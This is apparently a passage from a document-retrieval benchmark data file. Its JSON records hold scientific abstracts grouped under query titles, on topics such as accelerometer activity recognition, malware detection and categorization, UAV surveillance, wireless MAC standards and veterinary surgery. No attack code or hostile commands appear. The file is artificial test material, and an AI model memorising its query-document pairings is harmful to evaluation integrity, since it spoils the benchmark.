"text": "Illegal migration as well as wildfires constitute commonplace situations in southern European countries, where the mountainous terrain and thick forests make the surveillance and location of these incidents a tall task. This territory could benefit from Unmanned Aerial Vehicles (UAVs) equipped with optical and thermal sensors in conjunction with sophisticated image processing and computer vision algorithms, in order to detect suspicious activity or prevent the spreading of a fire. Taking into account that the flight height is about to two kilometers, human and fire detection algorithms are mainly based on blob detection. For both processes thermal imaging is used in order to improve the accuracy of the algorithms, while in the case of human recognition information like movement patterns as well as shadow size and shape are also considered. For fire detection a blob detector is utilized in conjunction with a color based descriptor, applied to thermal and optical images, respectively. Unlike fire, human detection is a more demanding process resulting in a more sophisticated and complex algorithm. The main difficulty of human detection originates from the high flight altitude. In images taken from high altitude where the ground sample distance is not small enough, people appear as small blobs occupying few pixels, leading corresponding research works to be based on blob detectors to detect humans. Their shadows as well as motion detection and object tracking can then be used to determine whether these regions of interest do depict humans. This work follows this motif as well, nevertheless, its main novelty lies in the fact that the human detection process is adapted for high altitude and vertical shooting images in contrast with the majority of other similar works where lower altitudes and different shooting angles are considered. Additionally, in the interest of making our algorithms as fast as possible in order for them to be used in real time during the UAV flights, parallel image processing with the help of a specialized hardware device based on Field Programmable Gate Array (FPGA) is being worked on.",
"title": ""
},
{
"docid": "fc97e17c5c9e1ea43570d799ac1ecd1f",
"text": "OBJECTIVE\nTo determine the clinical course in dogs with aural cholesteatoma.\n\n\nSTUDY DESIGN\nCase series.\n\n\nANIMALS\nDogs (n=20) with aural cholesteatoma.\n\n\nMETHODS\nCase review (1998-2007).\n\n\nRESULTS\nTwenty dogs were identified. Clinical signs other than those of chronic otitis externa included head tilt (6 dogs), unilateral facial palsy (4), pain on opening or inability to open the mouth (4), and ataxia (3). Computed tomography (CT) was performed in 19 dogs, abnormalities included osteoproliferation (13 dogs), lysis of the bulla (12), expansion of the bulla (11), bone lysis in the squamous or petrosal portion of the temporal bone (4) and enlargement of associated lymph nodes (7). Nineteen dogs had total ear canal ablation-lateral bulla osteotomy or ventral bulla osteotomy with the intent to cure; 9 dogs had no further signs of middle ear disease whereas 10 had persistent or recurrent clinical signs. Risk factors for recurrence after surgery were inability to open the mouth or neurologic signs on admission and lysis of any portion of the temporal bone on CT imaging. Dogs admitted with neurologic signs or inability to open the mouth had a median survival of 16 months.\n\n\nCONCLUSIONS\nEarly surgical treatment of aural cholesteatoma may be curative. Recurrence after surgery is associated with advanced disease, typically indicated by inability to open the jaw, neurologic disease, or bone lysis on CT imaging.\n\n\nCLINICAL RELEVANCE\nPresence of aural cholesteatoma may affect the prognosis for successful surgical treatment of middle ear disease.",
"title": ""
},
{
"docid": "5828308d458a1527f651d638375f3732",
"text": "We conducted a mixed methods study of the use of the Meerkat and Periscope apps for live streaming video and audio broadcasts from a mobile device. We crowdsourced a task to describe the content, setting, and other characteristics of 767 live streams. We also interviewed 20 frequent streamers to explore their motivations and experiences. Together, the data provide a snapshot of early live streaming use practices. We found a diverse range of activities broadcast, which interviewees said were used to build their personal brand. They described live streaming as providing an authentic, unedited view into their lives. They liked how the interaction with viewers shaped the content of their stream. We found some evidence for multiple live streams from the same event, which represent an opportunity for multiple perspectives on events of shared public interest.",
"title": ""
},
{
"docid": "3a18976245cfc4b50e97aadf304ef913",
"text": "Key-Value Stores (KVS) are becoming increasingly popular because they scale up and down elastically, sustain high throughputs for get/put workloads and have low latencies. KVS owe these advantages to their simplicity. This simplicity, however, comes at a cost: It is expensive to process complex, analytical queries on top of a KVS because today’s generation of KVS does not support an efficient way to scan the data. The problem is that there are conflicting goals when designing a KVS for analytical queries and for simple get/put workloads: Analytical queries require high locality and a compact representation of data whereas elastic get/put workloads require sparse indexes. This paper shows that it is possible to have it all, with reasonable compromises. We studied the KVS design space and built TellStore, a distributed KVS, that performs almost as well as state-of-the-art KVS for get/put workloads and orders of magnitude better for analytical and mixed workloads. This paper presents the results of comprehensive experiments with an extended version of the YCSB benchmark and a workload from the telecommunication industry.",
"title": ""
},
{
"docid": "d814a42313d2d42d0cd20c5b484806ff",
"text": "This paper compares Ad hoc On-demand Distance Vector (AODV), Dynamic Source Routing (DSR), and Wireless Routing Protocol (WRP) for MANETs to Distance Vector protocol to better understand the major characteristics of the three routing protocols, using a parallel discrete event-driven simulator, GloMoSim. MANET (mobile ad hoc network) is a multi-hop wireless network without a fixed infrastructure. There has not been much work that compares the performance of the MANET routing protocols, especially to Distance Vector protocol, which is a general routing protocol developed for legacy wired networks. The results of our experiments brought us nine key findings. Followings are some of our key findings: (1) AODV is most sensitive to changes in traffic load in the messaging overhead for routing. The number of control packets generated by AODV became 36 times larger when the traffic load was increased. For Distance Vector, WRP and DSR, their increase was approximately 1.3 times, 1.1 times and 7.6 times, respectively. (2) Two advantages common in the three MANET routing protocols compared to classical Distance Vector protocol were identified to be scalability for node mobility in end-to-end delay and scalability for node density in messaging overhead. (3) WRP resulted in the shortest delay and highest packet delivery rate, implying that WRP will be the best for real-time applications in the four protocols compared. WRP demonstrated the best traffic-scalability; control overhead will not increase much when traffic load increases.",
"title": ""
},
{
"docid": "6bdf0850725f091fea6bcdf7961e27d0",
"text": "The aim of this review is to document the advantages of exclusive breastfeeding along with concerns which may hinder the practice of breastfeeding and focuses on the appropriateness of complementary feeding and feeding difficulties which infants encounter. Breastfeeding, as recommended by the World Health Organisation, is the most cost effective way for reducing childhood morbidity such as obesity, hypertension and gastroenteritis as well as mortality. There are several factors that either promote or act as barriers to good infant nutrition. Factors which influence breastfeeding practice in terms of initiation, exclusivity and duration are namely breast engorgement, sore nipples, milk insufficiency and availability of various infant formulas. On the other hand, introduction of complementary foods, also known as weaning, is done around 4 to 6 months and mothers usually should start with home-made nutritious food. Difficulties encountered during the weaning process are often refusal to eat followed by vomiting, colic, allergic reactions and diarrhoea. key words: Exclusive breastfeeding, Weaning, Complementary feeding, Feeding difficulties.",
"title": ""
}
] | scidocsrr |
eab86768d7011d75ead6ddbe600373d0 | A Comparison of Feature Extraction Methods for the Classification of Dynamic Activities From Accelerometer Data | [
{
"docid": "c45b962006b2bb13ab57fe5d643e2ca6",
"text": "Physical activity has a positive impact on people's well-being, and it may also decrease the occurrence of chronic diseases. Activity recognition with wearable sensors can provide feedback to the user about his/her lifestyle regarding physical activity and sports, and thus, promote a more active lifestyle. So far, activity recognition has mostly been studied in supervised laboratory settings. The aim of this study was to examine how well the daily activities and sports performed by the subjects in unsupervised settings can be recognized compared to supervised settings. The activities were recognized by using a hybrid classifier combining a tree structure containing a priori knowledge and artificial neural networks, and also by using three reference classifiers. Activity data were collected for 68 h from 12 subjects, out of which the activity was supervised for 21 h and unsupervised for 47 h. Activities were recognized based on signal features from 3-D accelerometers on hip and wrist and GPS information. The activities included lying down, sitting and standing, walking, running, cycling with an exercise bike, rowing with a rowing machine, playing football, Nordic walking, and cycling with a regular bike. The total accuracy of the activity recognition using both supervised and unsupervised data was 89% that was only 1% unit lower than the accuracy of activity recognition using only supervised data. However, the accuracy decreased by 17% unit when only supervised data were used for training and only unsupervised data for validation, which emphasizes the need for out-of-laboratory data in the development of activity-recognition systems. The results support a vision of recognizing a wider spectrum, and more complex activities in real life settings.",
"title": ""
},
{
"docid": "7db00719532ab0d9b408d692171d908f",
"text": "The real-time monitoring of human movement can provide valuable information regarding an individual's degree of functional ability and general level of activity. This paper presents the implementation of a real-time classification system for the types of human movement associated with the data acquired from a single, waist-mounted triaxial accelerometer unit. The major advance proposed by the system is to perform the vast majority of signal processing onboard the wearable unit using embedded intelligence. In this way, the system distinguishes between periods of activity and rest, recognizes the postural orientation of the wearer, detects events such as walking and falls, and provides an estimation of metabolic energy expenditure. A laboratory-based trial involving six subjects was undertaken, with results indicating an overall accuracy of 90.8% across a series of 12 tasks (283 tests) involving a variety of movements related to normal daily activities. Distinction between activity and rest was performed without error; recognition of postural orientation was carried out with 94.1% accuracy, classification of walking was achieved with less certainty (83.3% accuracy), and detection of possible falls was made with 95.6% accuracy. Results demonstrate the feasibility of implementing an accelerometry-based, real-time movement classifier using embedded intelligence",
"title": ""
}
] | [
{
"docid": "4f7bcfbbc49a974ebb1c58d35e8c7f99",
"text": "Several studies have highlighted that the IEEE 802.15.4 standard presents a number of limitations such as low reliability, unbounded packet delays and no protection against interference/fading, that prevent its adoption in applications with stringent requirements in terms of reliability and latency. Recently, the IEEE has released the 802.15.4e amendment that introduces a number of enhancements/modifications to the MAC layer of the original standard in order to overcome such limitations. In this paper we provide a clear and structured overview of all the new 802.15.4e mechanisms. After a general introduction to the 802.15.4e standard, we describe the details of the main 802.15.4e MAC behavior modes, namely Time Slotted Channel Hopping (TSCH), Deterministic and Synchronous Multichannel Extension (DSME), and Low Latency Deterministic Network (LLDN). For each of them, we provide a detailed description and highlight the main features and possible application domains. Also, we survey the current literature and summarize open research issues.",
"title": ""
},
{
"docid": "28e95294b3a17feead850f3d52a97a81",
"text": "The conversion of chalcogen atoms to other types in transition metal dichalcogenides has significant advantages for tuning bandgaps and constructing in-plane heterojunctions; however, difficulty arises from the conversion of sulfur or selenium to tellurium atoms owing to the low decomposition temperature of tellurides. Here, we propose the use of sodium for converting monolayer molybdenum disulfide (MoS2) to molybdenum ditelluride (MoTe2) under Te-rich vapors. Sodium easily anchors tellurium and reduces the exchange barrier energy by scooting the tellurium to replace sulfur. The conversion was initiated at the edges and grain boundaries of MoS2, followed by complete conversion in the entire region. By controlling sodium concentration and reaction temperature of monolayer MoS2, we tailored various phases such as semiconducting 2H-MoTe2, metallic 1T′-MoTe2, and 2H-MoS2−x Te x alloys. This concept was further extended to WS2. A high valley polarization of ~37% in circularly polarized photoluminescence was obtained in the monolayer WS2−x Te x alloy at room temperature. Two dimensional monolayer transition metal ditellurides and their alloys are interesting but their growth has been difficult. Herein, Yun et al. demonstrate the use of sodium salts to convert transition metal disulfide to ditelluride and alloys in tellurium vapor at low temperature.",
"title": ""
},
{
"docid": "672de396251fcccadeb6bf7eecb6c71f",
"text": "Automatic gender recognition has been becoming very important in potential applications. Many state-of-the-art gender recognition approaches based on a variety of biometrics, such as face, body shape, voice, are proposed recently. Among them, relying on voice is suboptimal due to significant variations in pitch, emotion, and noise in real-world speech. Inspired from the speaker recognition approaches relying on i-vector presentation in NIST SRE, it's believed that i-vector contains information about gender as a part of speaker's characters, and works for speaker recognition as well as for gender recognition in complex environments. So, we apply the total variability space analysis to gender classification and propose i-vector based discrimination for speaker gender recognition. The results of experiments on TIMIT corpus and NUST603_2014 database show that the proposed i-vector based speaker gender recognition improves the performance up to 99.9%, and surpasses the pitch method and UBM-SVM baseline subsystems in term of accuracy comparatively.",
"title": ""
},
{
"docid": "f1ab2b5768da8f2f221b59a16c565f69",
"text": "Non-functional requirements (NFRs) have been the focus of research in Requirements Engineering (RE) for more than 20 years. Despite this attention, their ontological nature is still an open question, thereby hampering efforts to develop concepts, tools and techniques for eliciting, modeling, and analyzing them, in order to produce a specification for a system-to-be. In this paper, we propose to treat NFRs as qualities, based on definitions of the UFO foundational ontology. Furthermore, based on these ontological definitions, we provide guidelines for distinguishing between non-functional and functional requirements, and sketch a syntax of a specification language that can be used for capturing NFRs.",
"title": ""
},
{
"docid": "2021f6474af6233c2a919b96dc4758e4",
"text": "We introduce a new approach for finding overlapping clusters given pairwise similarities of objects. In particular, we relax the problem of correlation clustering by allowing an object to be assigned to more than one cluster. At the core of our approach is an optimization problem in which each data point is mapped to a small set of labels, representing membership in different clusters. The objective is to find a mapping so that the given similarities between objects agree as much as possible with similarities taken over their label sets. The number of labels can vary across objects. To define a similarity between label sets, we consider two measures: (i) a 0–1 function indicating whether the two label sets have non-zero intersection and (ii) the Jaccard coefficient between the two label sets. The algorithm we propose is an iterative local-search method. The definitions of label set similarity give rise to two non-trivial optimization problems, which, for the measures of set-intersection and Jaccard, we solve using a greedy strategy and non-negative least squares, respectively. We also develop a distributed version of our algorithm based on the BSP model and implement it using a Pregel framework. Our algorithm uses as input pairwise similarities of objects and can thus be applied when clustering structured objects for which feature vectors are not available. As a proof of concept, we apply our algorithms on three different and complex application domains: trajectories, amino-acid sequences, and textual documents.",
"title": ""
},
{
"docid": "ad61c6474832ecbe671040dfcb64e6aa",
"text": "This paper provides a brief overview on the recent advances of small-scale unmanned aerial vehicles (UAVs) from the perspective of platforms, key elements, and scientific research. The survey starts with an introduction of the recent advances of small-scale UAV platforms, based on the information summarized from 132 models available worldwide. Next, the evolvement of the key elements, including onboard processing units, navigation sensors, mission-oriented sensors, communication modules, and ground control station, is presented and analyzed. Third, achievements of small-scale UAV research, particularly on platform design and construction, dynamics modeling, and flight control, are introduced. Finally, the future of small-scale UAVs' research, civil applications, and military applications are forecasted.",
"title": ""
},
{
"docid": "b1d1571bbb260272e8679cc7a3f92cfe",
"text": "This article overviews the enzymes produced by microorganisms, which have been extensively studied worldwide for their isolation, purification and characterization of their specific properties. Researchers have isolated specific microorganisms from extreme sources under extreme culture conditions, with the objective that such isolated microbes would possess the capability to bio-synthesize special enzymes. Various Bio-industries require enzymes possessing special characteristics for their applications in processing of substrates and raw materials. The microbial enzymes act as bio-catalysts to perform reactions in bio-processes in an economical and environmentally-friendly way as opposed to the use of chemical catalysts. The special characteristics of enzymes are exploited for their commercial interest and industrial applications, which include: thermotolerance, thermophilic nature, tolerance to a varied range of pH, stability of enzyme activity over a range of temperature and pH, and other harsh reaction conditions. Such enzymes have proven their utility in bio-industries such as food, leather, textiles, animal feed, and in bio-conversions and bio-remediations.",
"title": ""
},
{
"docid": "fac56f5aa781c22104ab0d9ccc02d457",
"text": "BACKGROUND\nCurrent guidelines suggest that, for patients at moderate risk of death from unstable coronary-artery disease, either an interventional strategy (angiography followed by revascularisation) or a conservative strategy (ischaemia-driven or symptom-driven angiography) is appropriate. We aimed to test the hypothesis that an interventional strategy is better than a conservative strategy in such patients.\n\n\nMETHODS\nWe did a randomised multicentre trial of 1810 patients with non-ST-elevation acute coronary syndromes (mean age 62 years, 38% women). Patients were assigned an early intervention or conservative strategy. The antithrombin agent in both groups was enoxaparin. The co-primary endpoints were a combined rate of death, non-fatal myocardial infarction, or refractory angina at 4 months; and a combined rate of death or non-fatal myocardial infarction at 1 year. Analysis was by intention to treat.\n\n\nFINDINGS\nAt 4 months, 86 (9.6%) of 895 patients in the intervention group had died or had a myocardial infarction or refractory angina, compared with 133 (14.5%) of 915 patients in the conservative group (risk ratio 0.66, 95% CI 0.51-0.85, p=0.001). This difference was mainly due to a halving of refractory angina in the intervention group. Death or myocardial infarction was similar in both treatment groups at 1 year (68 [7.6%] vs 76 [8.3%], respectively; risk ratio 0.91, 95% CI 0.67-1.25, p=0.58). Symptoms of angina were improved and use of antianginal medications significantly reduced with the interventional strategy (p<0.0001).\n\n\nINTERPRETATION\nIn patients presenting with unstable coronary-artery disease, an interventional strategy is preferable to a conservative strategy, mainly because of the halving of refractory or severe angina, and with no increased risk of death or myocardial infarction.",
"title": ""
},
{
"docid": "ba6fe1b26d76d7ff3e84ddf3ca5d3e35",
"text": "The spacing effect describes the robust finding that long-term learning is promoted when learning events are spaced out in time rather than presented in immediate succession. Studies of the spacing effect have focused on memory processes rather than for other types of learning, such as the acquisition and generalization of new concepts. In this study, early elementary school children (5- to 7-year-olds; N = 36) were presented with science lessons on 1 of 3 schedules: massed, clumped, and spaced. The results revealed that spacing lessons out in time resulted in higher generalization performance for both simple and complex concepts. Spaced learning schedules promote several types of learning, strengthening the implications of the spacing effect for educational practices and curriculum.",
"title": ""
},
{
"docid": "c8d235d1fd40e972e9bc7078d6472776",
"text": "Performance of machine learning algorithms depends critically on identifying a good set of hyperparameters. While current methods offer efficiencies by adaptively choosing new configurations to train, an alternative strategy is to adaptively allocate resources across the selected configurations. We formulate hyperparameter optimization as a pure-exploration non-stochastic infinitely many armed bandit problem where allocation of additional resources to an arm corresponds to training a configuration on larger subsets of the data. We introduce HYPERBAND for this framework and analyze its theoretical properties, providing several desirable guarantees. We compare HYPERBAND with state-ofthe-art Bayesian optimization methods and a random search baseline on a comprehensive benchmark including 117 datasets. Our results on this benchmark demonstrate that while Bayesian optimization methods do not outperform random search trained for twice as long, HYPERBAND in favorable settings offers valuable speedups.",
"title": ""
},
{
"docid": "e2f83de1005e844e36a7c0cf241ec1f5",
"text": "Dermoscopy image is usually used in early diagnosis of malignant melanoma. The diagnosis accuracy by visual inspection is highly relied on the dermatologist's clinical experience. Due to the inaccuracy, subjectivity, and poor reproducibility of human judgement, an automatic recognition algorithm of dermoscopy image is highly desired. In this work, we present a hybrid classification framework for dermoscopy image assessment by combining deep convolutional neural network (CNN), Fisher vector (FV) and support vector machine (SVM). Specifically, the deep representations of subimages at various locations of a rescaled dermoscopy image are first extracted via a natural image dataset pre-trained on CNN. Then we adopt an orderless visual statistics based FV encoding methods to aggregate these features to build more invariant representations. Finally, the FV encoded representations are classified for diagnosis using a linear SVM. Compared with traditional low-level visual features based recognition approaches, our scheme is simpler and requires no complex preprocessing. Furthermore, the orderless representations are less sensitive to geometric deformation. We evaluate our proposed method on the ISBI 2016 Skin lesion challenge dataset and promising results are obtained. Also, we achieve consistent improvement in accuracy even without fine-tuning the CNN.",
"title": ""
},
{
"docid": "a836b7771937a15bc90d27de9fb8f9e4",
"text": "Principal component analysis (PCA) is a mainstay of modern data analysis a black box that is widely used but poorly understood. The goal of this paper is to dispel the magic behind this black box. This tutorial focuses on building a solid intuition for how and why principal component analysis works; furthermore, it crystallizes this knowledge by deriving from first principals, the mathematics behind PCA . This tutorial does not shy away from explaining the ideas informally, nor does it shy away from the mathematics. The hope is that by addressing both aspects, readers of all levels will be able to gain a better understanding of the power of PCA as well as the when, the how and the why of applying this technique.",
"title": ""
},
{
"docid": "b6983a5ccdac40607949e2bfe2beace2",
"text": "A focus on novel, confirmatory, and statistically significant results leads to substantial bias in the scientific literature. One type of bias, known as \"p-hacking,\" occurs when researchers collect or select data or statistical analyses until nonsignificant results become significant. Here, we use text-mining to demonstrate that p-hacking is widespread throughout science. We then illustrate how one can test for p-hacking when performing a meta-analysis and show that, while p-hacking is probably common, its effect seems to be weak relative to the real effect sizes being measured. This result suggests that p-hacking probably does not drastically alter scientific consensuses drawn from meta-analyses.",
"title": ""
},
{
"docid": "c9582409212e6f9b194175845216b2b6",
"text": "Although the amygdala complex is a brain area critical for human behavior, knowledge of its subspecialization is primarily derived from experiments in animals. We here employed methods for large-scale data mining to perform a connectivity-derived parcellation of the human amygdala based on whole-brain coactivation patterns computed for each seed voxel. Voxels within the histologically defined human amygdala were clustered into distinct groups based on their brain-wide coactivation maps. Using this approach, connectivity-based parcellation divided the amygdala into three distinct clusters that are highly consistent with earlier microstructural distinctions. Meta-analytic connectivity modelling then revealed the derived clusters' brain-wide connectivity patterns, while meta-data profiling allowed their functional characterization. These analyses revealed that the amygdala's laterobasal nuclei group was associated with coordinating high-level sensory input, whereas its centromedial nuclei group was linked to mediating attentional, vegetative, and motor responses. The often-neglected superficial nuclei group emerged as particularly sensitive to olfactory and probably social information processing. The results of this model-free approach support the concordance of structural, connectional, and functional organization in the human amygdala and point to the importance of acknowledging the heterogeneity of this region in neuroimaging research.",
"title": ""
},
{
"docid": "b81a28179d547f9f7b26a94da74166ea",
"text": "Contextual information plays an important role in solving vision problems such as image segmentation. However, extracting contextual information and using it in an effective way remains a difficult problem. To address this challenge, we propose a multi-resolution contextual framework, called cascaded hierarchical model (CHM), which learns contextual information in a hierarchical framework for image segmentation. At each level of the hierarchy, a classifier is trained based on down sampled input images and outputs of previous levels. Our model then incorporates the resulting multi-resolution contextual information into a classifier to segment the input image at original resolution. We repeat this procedure by cascading the hierarchical framework to improve the segmentation accuracy. Multiple classifiers are learned in the CHM, therefore, a fast and accurate classifier is required to make the training tractable. The classifier also needs to be robust against over fitting due to the large number of parameters learned during training. We introduce a novel classification scheme, called logistic disjunctive normal networks (LDNN), which consists of one adaptive layer of feature detectors implemented by logistic sigmoid functions followed by two fixed layers of logical units that compute conjunctions and disjunctions, respectively. We demonstrate that LDNN outperforms state-of-the-art classifiers and can be used in the CHM to improve object segmentation performance.",
"title": ""
},
{
"docid": "a6e062620666a4f6e88373d746d4418c",
"text": "A method for fabricating planar implantable microelectrode arrays was demonstrated using a process that relied on ultra-thin silicon substrates, which ranged in thickness from 25 to 50 μm. The challenge of handling these fragile materials was met via a temporary substrate support mechanism. In order to compensate for putative electrical shielding of extracellular neuronal fields, separately addressable electrode arrays were defined on each side of the silicon device. Deep reactive ion etching was employed to create sharp implantable shafts with lengths of up to 5 mm. The devices were flip-chip bonded onto printed circuit boards (PCBs) by means of an anisotropic conductive adhesive film. This scalable assembly technique enabled three-dimensional (3D) integration through formation of stacks of multiple silicon and PCB layers. Simulations and measurements of microelectrode noise appear to suggest that low impedance surfaces, which could be formed by electrodeposition of gold or other materials, are required to ensure an optimal signal-to-noise ratio as well a low level of interchannel crosstalk. (Some figures in this article are in colour only in the electronic version)",
"title": ""
},
{
"docid": "ff83e090897ed7b79537392801078ffb",
"text": "Component-based software engineering has had great impact in the desktop and server domain and is spreading to other domains as well, such as embedded systems. Agile software development is another approach which has gained much attention in recent years, mainly for smaller-scale production of less critical systems. Both of them promise to increase system quality, development speed and flexibility, but so far little has been published on the combination of the two approaches. This paper presents a comprehensive analysis of the applicability of the agile approach in the development processes of 1) COTS components and 2) COTS-based systems. The study method is a systematic theoretical examination and comparison of the fundamental concepts and characteristics of these approaches. The contributions are: first, an enumeration of identified contradictions between the approaches, and suggestions how to bridge these incompatibilities to some extent. Second, the paper provides some more general comments, considerations, and application guidelines concerning the introduction of agile principles into the development of COTS components or COTS-based systems. This study thus forms a framework which will guide further empirical studies.",
"title": ""
},
{
"docid": "6ed1985653d20180383948515edaf9a8",
"text": "The paradigm of ubiquitous computing has the potential to enhance classroom behavior management. In this work, we used an action research approach to examine the use of a tablet-based behavioral data collection system by school practitioners, and co-design an interface for displaying the behavioral data to their students. We present a wall-mounted display prototype and discuss its potential for supplementing existing classroom behavior management practices. We found that wall-mounted displays could help school practitioners to provide a wider range of behavioral reinforces and deliver specific and immediate feedback to students.",
"title": ""
},
{
"docid": "58da9f4a32fe0ea42d12718ff825b9b2",
"text": "Electroencephalography (EEG) is one fundamental tool for functional brain imaging. EEG signals tend to be represented by a vector or a matrix to facilitate data processing and analysis with generally understood methodologies like time-series analysis, spectral analysis and matrix decomposition. Indeed, EEG signals are often naturally born with more than two modes of time and space, and they can be denoted by a multi-way array called as tensor. This review summarizes the current progress of tensor decomposition of EEG signals with three aspects. The first is about the existing modes and tensors of EEG signals. Second, two fundamental tensor decomposition models, canonical polyadic decomposition (CPD, it is also called parallel factor analysis-PARAFAC) and Tucker decomposition, are introduced and compared. Moreover, the applications of the two models for EEG signals are addressed. Particularly, the determination of the number of components for each mode is discussed. Finally, the N-way partial least square and higher-order partial least square are described for a potential trend to process and analyze brain signals of two modalities simultaneously.",
"title": ""
},
{
"docid": "b1b57467dff40b52822ff2406405b217",
"text": "Placement of attributes/methods within classes in an object-oriented system is usually guided by conceptual criteria and aided by appropriate metrics. Moving state and behavior between classes can help reduce coupling and increase cohesion, but it is nontrivial to identify where such refactorings should be applied. In this paper, we propose a methodology for the identification of Move Method refactoring opportunities that constitute a way for solving many common feature envy bad smells. An algorithm that employs the notion of distance between system entities (attributes/methods) and classes extracts a list of behavior-preserving refactorings based on the examination of a set of preconditions. In practice, a software system may exhibit such problems in many different places. Therefore, our approach measures the effect of all refactoring suggestions based on a novel entity placement metric that quantifies how well entities have been placed in system classes. The proposed methodology can be regarded as a semi-automatic approach since the designer will eventually decide whether a suggested refactoring should be applied or not based on conceptual or other design quality criteria. The evaluation of the proposed approach has been performed considering qualitative, metric, conceptual, and efficiency aspects of the suggested refactorings in a number of open-source projects.",
"title": ""
}
] | scidocsrr |
426318eb3111163c7c6ef00b01aea650 | Intelligent malware detection based on file relation graphs | [
{
"docid": "b37de4587fbadad9258c1c063b03a07a",
"text": "Numerous attacks, such as worms, phishing, and botnets, threaten the availability of the Internet, the integrity of its hosts, and the privacy of its users. A core element of defense against these attacks is anti-virus(AV)–a service that detects, removes, and characterizes these threats. The ability of these products to successfully characterize these threats has far-reaching effects—from facilitating sharing across organizations, to detecting the emergence of new threats, and assessing risk in quarantine and cleanup. In this paper, we examine the ability of existing host-based anti-virus products to provide semantically meaningful information about the malicious software and tools (or malware) used by attackers. Using a large, recent collection of malware that spans a variety of attack vectors (e.g., spyware, worms, spam), we show that different AV products characterize malware in ways that are inconsistent across AV products, incomplete across malware, and that fail to be concise in their semantics. To address these limitations, we propose a new classification technique that describes malware behavior in terms of system state changes (e.g., files written, processes created) rather than in sequences or patterns of system calls. To address the sheer volume of malware and diversity of its behavior, we provide a method for automatically categorizing these profiles of malware into groups that reflect similar classes of behaviors and demonstrate how behavior-based clustering provides a more direct and effective way of classifying and analyzing Internet malware.",
"title": ""
},
{
"docid": "1c5f38009bb14d016ad8c44eed462184",
"text": "Data stream classification for intrusion detection poses at least three major challenges. First, these data streams are typically infinite-length, making traditional multipass learning algorithms inapplicable. Second, they exhibit significant concept-drift as attackers react and adapt to defenses. Third, for data streams that do not have any fixed feature set, such as text streams, an additional feature extraction and selection task must be performed. If the number of candidate features is too large, then traditional feature extraction techniques fail.\n In order to address the first two challenges, this article proposes a multipartition, multichunk ensemble classifier in which a collection of v classifiers is trained from r consecutive data chunks using v-fold partitioning of the data, yielding an ensemble of such classifiers. This multipartition, multichunk ensemble technique significantly reduces classification error compared to existing single-partition, single-chunk ensemble approaches, wherein a single data chunk is used to train each classifier. To address the third challenge, a feature extraction and selection technique is proposed for data streams that do not have any fixed feature set. The technique's scalability is demonstrated through an implementation for the Hadoop MapReduce cloud computing architecture. Both theoretical and empirical evidence demonstrate its effectiveness over other state-of-the-art stream classification techniques on synthetic data, real botnet traffic, and malicious executables.",
"title": ""
},
{
"docid": "c76d8ac34709f84215e365e2412b9f4e",
"text": "Anti-virus vendors are confronted with a multitude of potentially malicious samples today. Receiving thousands of new samples every day is not uncommon. The signatures that detect confirmed malicious threats are mainly still created manually, so it is important to discriminate between samples that pose a new unknown threat and those that are mere variants of known malware.\n This survey article provides an overview of techniques based on dynamic analysis that are used to analyze potentially malicious samples. It also covers analysis programs that leverage these It also covers analysis programs that employ these techniques to assist human analysts in assessing, in a timely and appropriate manner, whether a given sample deserves closer manual inspection due to its unknown malicious behavior.",
"title": ""
},
{
"docid": "2ba02f5d4339d993bda22f51c965fa2e",
"text": "In this paper, resting on the analysis of instruction frequency and function-based instruction sequences, we develop an Automatic Malware Categorization System (AMCS) for automatically grouping malware samples into families that share some common characteristics using a cluster ensemble by aggregating the clustering solutions generated by different base clustering algorithms. We propose a principled cluster ensemble framework for combining individual clustering solutions based on the consensus partition. The domain knowledge in the form of sample-level constraints can be naturally incorporated in the ensemble framework. In addition, to account for the characteristics of feature representations, we propose a hybrid hierarchical clustering algorithm which combines the merits of hierarchical clustering and k-medoids algorithms and a weighted subspace K-medoids algorithm to generate base clusterings. The categorization results of our AMCS system can be used to generate signatures for malware families that are useful for malware detection. The case studies on large and real daily malware collection from Kingsoft Anti-Virus Lab demonstrate the effectiveness and efficiency of our AMCS system.",
"title": ""
}
] | [
{
"docid": "5857805620b43cafa7a18461dfb74363",
"text": "In this paper, we give an overview for the shared task at the 5th CCF Conference on Natural Language Processing & Chinese Computing (NLPCC 2016): Chinese word segmentation for micro-blog texts. Different with the popular used newswire datasets, the dataset of this shared task consists of the relatively informal micro-texts. Besides, we also use a new psychometric-inspired evaluation metric for Chinese word segmentation, which addresses to balance the very skewed word distribution at different levels of difficulty. The data and evaluation codes can be downloaded from https://github.com/FudanNLP/ NLPCC-WordSeg-Weibo.",
"title": ""
},
{
"docid": "89bec90bd6715a3907fba9f0f7655158",
"text": "Long text brings a big challenge to neural network based text matching approaches due to their complicated structures. To tackle the challenge, we propose a knowledge enhanced hybrid neural network (KEHNN) that leverages prior knowledge to identify useful information and filter out noise in long text and performs matching from multiple perspectives. The model fuses prior knowledge into word representations by knowledge gates and establishes three matching channels with words, sequential structures of text given by Gated Recurrent Units (GRUs), and knowledge enhanced representations. The three channels are processed by a convolutional neural network to generate high level features for matching, and the features are synthesized as a matching score by a multilayer perceptron. In this paper, we focus on exploring the use of taxonomy knowledge for text matching. Evaluation results from extensive experiments on public data sets of question answering and conversation show that KEHNN can significantly outperform state-of-the-art matching models and particularly improve matching accuracy on pairs with long text.",
"title": ""
},
{
"docid": "9b57784b60ce53e323432cee5efbf321",
"text": "PURPOSE\nOver the last 10-15 years, there has been a substantive increase in compassion-based interventions aiming to improve psychological functioning and well-being.\n\n\nMETHODS\nThis study provides an overview and synthesis of the currently available compassion-based interventions. What do these programmes looks like, what are their aims, and what is the state of evidence underpinning each of them?\n\n\nRESULTS\nThis overview has found at least eight different compassion-based interventions (e.g., Compassion-Focused Therapy, Mindful Self-Compassion, Cultivating Compassion Training, Cognitively Based Compassion Training), with six having been evaluated in randomized controlled trials, and with a recent meta-analysis finding that compassion-based interventions produce moderate effect sizes for suffering and improved life satisfaction.\n\n\nCONCLUSIONS\nAlthough further research is warranted, the current state of evidence highlights the potential benefits of compassion-based interventions on a range of outcomes that clinicians can use in clinical practice with clients.\n\n\nPRACTITIONER POINTS\nThere are eight established compassion intervention programmes with six having RCT evidence. The most evaluated intervention to date is compassion-focused therapy. Further RCTs are needed in clinical populations for all compassion interventions. Ten recommendations are provided to improve the evidence-base of compassion interventions.",
"title": ""
},
{
"docid": "46adb7a040a2d8a40910a9f03825588d",
